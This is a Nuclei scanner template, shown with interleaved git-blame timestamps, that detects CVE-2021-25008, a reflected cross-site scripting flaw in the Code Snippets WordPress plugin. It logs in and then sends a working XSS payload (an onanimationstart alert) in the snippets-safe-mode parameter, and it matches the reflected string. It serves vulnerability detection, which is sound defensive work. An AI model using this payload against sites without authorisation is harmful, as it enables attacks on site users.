2022-02-08 01:07:19 +00:00
id : CVE-2021-25008
info :
2022-08-19 20:44:38 +00:00
name : The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting
2022-02-08 01:07:19 +00:00
author : cckuailong
severity : medium
2022-08-19 20:44:38 +00:00
description : The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.
2022-02-08 01:07:19 +00:00
reference :
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25008
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-25008
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00141
cpe : cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : codesnippets
product : code_snippets
tags : authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
2022-02-08 01:07:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-08 01:07:19 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 19:19:53 +00:00
GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
2022-02-08 01:07:19 +00:00
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-02-08 01:07:19 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-08 19:19:53 +00:00
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
2022-02-08 01:07:19 +00:00
- "Snippets"
condition : and
- type : status
status :
2022-02-08 19:19:53 +00:00
- 200